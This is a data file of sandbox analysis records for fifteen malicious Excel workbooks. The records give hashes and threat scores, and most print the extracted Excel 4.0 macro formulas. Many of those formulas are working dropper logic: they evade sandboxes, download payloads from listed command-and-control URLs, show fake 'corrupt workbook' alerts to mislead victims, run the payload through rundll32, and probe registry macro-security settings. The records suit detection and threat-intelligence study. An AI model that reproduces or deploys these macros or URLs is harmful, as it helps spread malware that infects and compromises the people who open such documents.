{"version":"0.2","sample":{"sample":"","kind":"file","target":"68297b205b2ad8b098ecd0c493f7da1402bc937b58abf07683df0f3ec34907ee"},"analysis":{"reported":"2020-04-09T16:16:48Z","score":10},"files":[{"filename":"68297b205b2ad8b098ecd0c493f7da1402bc937b58abf07683df0f3ec34907ee","filesize":170496,"md5":"f064e500e968a7f9be6f44337982a47c","sha1":"409c76334fde1a54d9924226a8af2d63996c3509","sha256":"68297b205b2ad8b098ecd0c493f7da1402bc937b58abf07683df0f3ec34907ee","sha512":"acbe2afbb44d86dafe97acfe7806de139ec6fdb4d5ea45016cf585bd0253773bc0a3b279cdd1d4c43011c09b52c26e8467f3cb45b1251f4b5e8b805717a1c518","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"68297b205b2ad8b098ecd0c493f7da1402bc937b58abf07683df0f3ec34907ee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1MGzPItsJO\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"682d0e043daf9941d86e6097778539ca12ba2a318787b61d12abcce0b26f8164"},"analysis":{"reported":"2020-04-09T16:16:48Z","score":10},"files":[{"filename":"682d0e043daf9941d86e6097778539ca12ba2a318787b61d12abcce0b26f8164","filesize":170496,"md5":"c01315ed8e2f15c0eba9728cbff8d13c","sha1":"99bbb6c385206deb5f025dad75d6e4994737f709","sha256":"682d0e043daf9941d86e6097778539ca12ba2a318787b61d12abcce0b26f8164","sha512":"1f04acb6bc09e3335f895ec973ae8d34e28b85dd2359796d3a3d87b8b3f05b41565d6ae93362637f4c9c4250e03ceecb51dffaf011b4fa1ef1588f28a4660a8e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"682d0e043daf9941d86e6097778539ca12ba2a318787b61d12abcce0b26f8164.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uutsPvrBHn\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"68354509f416c35d9f9a0566eb90cace893c0afe72728e28c697ace6705f3c71"},"analysis":{"reported":"2020-04-09T16:16:48Z","score":10},"files":[{"filename":"68354509f416c35d9f9a0566eb90cace893c0afe72728e28c697ace6705f3c71","filesize":209408,"md5":"f1133ed7833753d83ea82c59f1282284","sha1":"0b538b3edb28a6482c06ea2f875a7a52c2a1acc3","sha256":"68354509f416c35d9f9a0566eb90cace893c0afe72728e28c697ace6705f3c71","sha512":"55197297f00ff713b0b53738edb8de0429d709c1815dea30551ff2760b158fab5343c9ade3d25283f0d12c92dd31483005333dce684e9d0612a3a92781cc5441","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"68354509f416c35d9f9a0566eb90cace893c0afe72728e28c697ace6705f3c71.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YmvZSk17aY\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"684565124befc43f497bd9865765a3d30992f89ff3b3a36df461e99b612b04de"},"analysis":{"reported":"2020-04-09T16:16:48Z","score":10},"files":[{"filename":"684565124befc43f497bd9865765a3d30992f89ff3b3a36df461e99b612b04de","filesize":221184,"md5":"d8aa4c9e90095bfc3a2e3aac4596f970","sha1":"2f083de5b44b1795676ee187499bc00f059748b6","sha256":"684565124befc43f497bd9865765a3d30992f89ff3b3a36df461e99b612b04de","sha512":"654c1c00355c114b133e8771cd820db74373239b664514dae4244b9578cfdf1e217fc28fdfbcb48f32eb2628d0b34e68e98c6c2d77238f40cbbaface3bdc045a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"684565124befc43f497bd9865765a3d30992f89ff3b3a36df461e99b612b04de.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LN3FvXFZJy\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"684e116f58d4c543cf156f88234dbee08379f3627ed17008541258cef1937cee"},"analysis":{"reported":"2020-04-09T16:16:48Z","score":10},"files":[{"filename":"684e116f58d4c543cf156f88234dbee08379f3627ed17008541258cef1937cee","filesize":221184,"md5":"8393a14df9c485031e7e5c8b9b6a796e","sha1":"ffc39c7f9cc79d99cc0a08813ab9f6e4b0b3adae","sha256":"684e116f58d4c543cf156f88234dbee08379f3627ed17008541258cef1937cee","sha512":"1072f2285f94e4adfeea8697659c787f0a0a52eb1012b3494e9554c137dbf239fdd39a42fc7a2979a4d71fc9a4a305a9d22102596219c8003611689795bc2c18","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"684e116f58d4c543cf156f88234dbee08379f3627ed17008541258cef1937cee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zEGXwAwmuc\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6854d64084521fdfcbd3fbe50ed2799f72b58729af45dfb84b750e58a59079aa"},"analysis":{"reported":"2020-04-09T16:16:48Z","score":10},"files":[{"filename":"6854d64084521fdfcbd3fbe50ed2799f72b58729af45dfb84b750e58a59079aa","filesize":185344,"md5":"0907370eb8f599adc7d97fcf080a9b6e","sha1":"19002306eed323015a8b54aa6a468ede5080683f","sha256":"6854d64084521fdfcbd3fbe50ed2799f72b58729af45dfb84b750e58a59079aa","sha512":"58d901db6cb0751963d136adfa37b2f2150987fbe1e690365eadf7d91ecdcceb57573c785efdb80d5459d216b9be025d6f0a16dd17a455459fa0313b87cfd354","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6854d64084521fdfcbd3fbe50ed2799f72b58729af45dfb84b750e58a59079aa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6854fb750f8859bd736d571f944f0b894ed3c47c77089607afc6e9af93e09f18"},"analysis":{"reported":"2020-04-09T16:16:48Z","score":10},"files":[{"filename":"6854fb750f8859bd736d571f944f0b894ed3c47c77089607afc6e9af93e09f18","filesize":209920,"md5":"908fb3a4238cad242dbe5db684b8d5f8","sha1":"7f15b1345413ce0ff56bb9a723cc4661f26540e2","sha256":"6854fb750f8859bd736d571f944f0b894ed3c47c77089607afc6e9af93e09f18","sha512":"7c0a5b1bff6b45c6a6ecc09b801ef4850ff83669138b6fbc4c2bcff4d9cab657cae760ee62cd90fde379e6dee50775da47fa09bad08210c99eadf4cc2383bc1f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6854fb750f8859bd736d571f944f0b894ed3c47c77089607afc6e9af93e09f18.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"nd46jMxHqZ\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"686a075002f85f433c1ba1aba580298062054ce145488cdd0922ee2d46298d04"},"analysis":{"reported":"2020-04-09T16:16:48Z","score":10},"files":[{"filename":"686a075002f85f433c1ba1aba580298062054ce145488cdd0922ee2d46298d04","filesize":167936,"md5":"1e4a5a4141ade579e4c7d1657964b956","sha1":"6f97f8c7d4b5d32838de4df4b61b81c00d55dfa1","sha256":"686a075002f85f433c1ba1aba580298062054ce145488cdd0922ee2d46298d04","sha512":"fcf34a6bfc58759620d782b49984ae21858c4c74d9c710730b4048df883fe8f0328297e9baa9a5f35fa0468b18b8c8d02bcd2fea8a4f9e9dc748f3511a6059c5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"686a075002f85f433c1ba1aba580298062054ce145488cdd0922ee2d46298d04.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vmzqTc7mkS\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"686fab307c9f777c80d0d9fe710aa185014bdefb7379269f9615bb7ac51e67d3"},"analysis":{"reported":"2020-04-09T16:16:48Z","score":10},"files":[{"filename":"686fab307c9f777c80d0d9fe710aa185014bdefb7379269f9615bb7ac51e67d3","filesize":185344,"md5":"aa97507d158a7c73a7fb20b912d2ac92","sha1":"98531146a31ce44c47260119130ab3e3315fd6ec","sha256":"686fab307c9f777c80d0d9fe710aa185014bdefb7379269f9615bb7ac51e67d3","sha512":"02662a7e3caa79676a57d6671cbd86e3282757a74f26496cf97553977b637ed091277946bae1d1056edc01bcb43c5d030ea6f3691d37e5a7016551d25968b4d0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"686fab307c9f777c80d0d9fe710aa185014bdefb7379269f9615bb7ac51e67d3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6872675d25b7239e01989be115a3289f5f3f2187ea6c359946e7cec3cc0fa8b1"},"analysis":{"reported":"2020-04-09T16:16:48Z","score":10},"files":[{"filename":"6872675d25b7239e01989be115a3289f5f3f2187ea6c359946e7cec3cc0fa8b1","filesize":209920,"md5":"8e62c95d29f408225bbecbd9caccfe59","sha1":"2f004a96d3211f1c2f5a9d5f503aab5fc4ab1c97","sha256":"6872675d25b7239e01989be115a3289f5f3f2187ea6c359946e7cec3cc0fa8b1","sha512":"aadf6f97b8e1996d5d5474636dc723d5dcf0c5239ede228556cf5f4dcb23e7a7008b47ace5d64a53fda3a95f908a2671b44d00a277b08ba77edab12be6c760e1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6872675d25b7239e01989be115a3289f5f3f2187ea6c359946e7cec3cc0fa8b1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gDh2GS1SJW\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6878ad29fc4b5bb68df29dee2d940e06a9271028095bcb49e06f16f297fa5f58"},"analysis":{"reported":"2020-04-09T16:16:48Z","score":10},"files":[{"filename":"6878ad29fc4b5bb68df29dee2d940e06a9271028095bcb49e06f16f297fa5f58","filesize":152576,"md5":"c4eab49fed0e429aa18b70a7f450605a","sha1":"5cde3f98441b3b575898d87ee0a65e84a33a8603","sha256":"6878ad29fc4b5bb68df29dee2d940e06a9271028095bcb49e06f16f297fa5f58","sha512":"fbcc587e1e8cc69f686dd214f069669ea1a5edc7cc36ff8acab14cf33abafc9155a575685157a97a9f27c5b08ed7c38bb94614c08c3e97b0238c12c4c40d0148","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6878ad29fc4b5bb68df29dee2d940e06a9271028095bcb49e06f16f297fa5f58.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"b9ccAV35DJ\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6879310d5a89f85d0bf27cf7d7705fa6c5348d5bb09eb70157e2887765a0634c"},"analysis":{"reported":"2020-04-09T16:16:48Z","score":10},"files":[{"filename":"6879310d5a89f85d0bf27cf7d7705fa6c5348d5bb09eb70157e2887765a0634c","filesize":209408,"md5":"f38a9a8c6563eb4f0f82d58120705c72","sha1":"dbcfac1655536ab2f49ad03d8d17370002588e90","sha256":"6879310d5a89f85d0bf27cf7d7705fa6c5348d5bb09eb70157e2887765a0634c","sha512":"f7b031f4fea1dc7e5fea43d8a7aef9266bd8727094273e53d00563eada04981e8a6d8c102e458abdc0e8cd0eefed61d41cd3dc864f0c67647e3821c5ba2a4cd6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6879310d5a89f85d0bf27cf7d7705fa6c5348d5bb09eb70157e2887765a0634c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tSZVUqbig4\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"68891a6d74244d1e367ea075100b9f17acd665b15f129840a4226d99ea6ecce3"},"analysis":{"reported":"2020-04-09T16:16:48Z","score":10},"files":[{"filename":"68891a6d74244d1e367ea075100b9f17acd665b15f129840a4226d99ea6ecce3","filesize":167936,"md5":"ecc758d7645cb124ed4c17415962c5a6","sha1":"f17bd299f63d348f387342d06753319408be765d","sha256":"68891a6d74244d1e367ea075100b9f17acd665b15f129840a4226d99ea6ecce3","sha512":"58ef049a8f76c2b590e8e863e396dd6cf2c27fd4031a532f694594cd09cb5b289056451b1667e26391a1748e9e6ace837477f575d6178bbcaff798694a8fc4a5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"68891a6d74244d1e367ea075100b9f17acd665b15f129840a4226d99ea6ecce3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wA5oeBjePy\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"689483d852eb3fe2294396b3359ec66cbc8bad4ef95aa749c49b52963cd6fcc7"},"analysis":{"reported":"2020-04-09T16:16:48Z","score":10},"files":[{"filename":"689483d852eb3fe2294396b3359ec66cbc8bad4ef95aa749c49b52963cd6fcc7","filesize":171008,"md5":"53adce64c92f15ea77225db8b6c8659f","sha1":"0e9de35ba73b98ae210953ae519a7989123590df","sha256":"689483d852eb3fe2294396b3359ec66cbc8bad4ef95aa749c49b52963cd6fcc7","sha512":"25eb0995a03ac16bd679e72b9ec48bcbefd417bb1d19f85c2797972742f68cced13662c499bd5af2aabacf84bd58eca2818ac8a8835d6e0ec8e608c3bd410998","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"689483d852eb3fe2294396b3359ec66cbc8bad4ef95aa749c49b52963cd6fcc7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"f90L1DCzuT\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"689d4017f208ce6f8c581f16539fb6ec28b68cd1b353418ca2fc3c28c1badf45"},"analysis":{"reported":"2020-04-09T16:16:49Z","score":10},"files":[{"filename":"689d4017f208ce6f8c581f16539fb6ec28b68cd1b353418ca2fc3c28c1badf45","filesize":170496,"md5":"09f5f7c0b85de29165ca2e9e4125c408","sha1":"307a251f79f71ef5ec69623aa6f58008bf474a88","sha256":"689d4017f208ce6f8c581f16539fb6ec28b68cd1b353418ca2fc3c28c1badf45","sha512":"14c05b3e27c92a174906066213854a9972509f2dcc7cfd0b9836e183a24855516c0f734e91b1da3e7e046d2b591e62d5c3fa99d72d367e7c24ba3173e17ead9a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"689d4017f208ce6f8c581f16539fb6ec28b68cd1b353418ca2fc3c28c1badf45.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3NZLOddGvg\",TRUE)\nGOTO(R$0C$19)"}}}]}
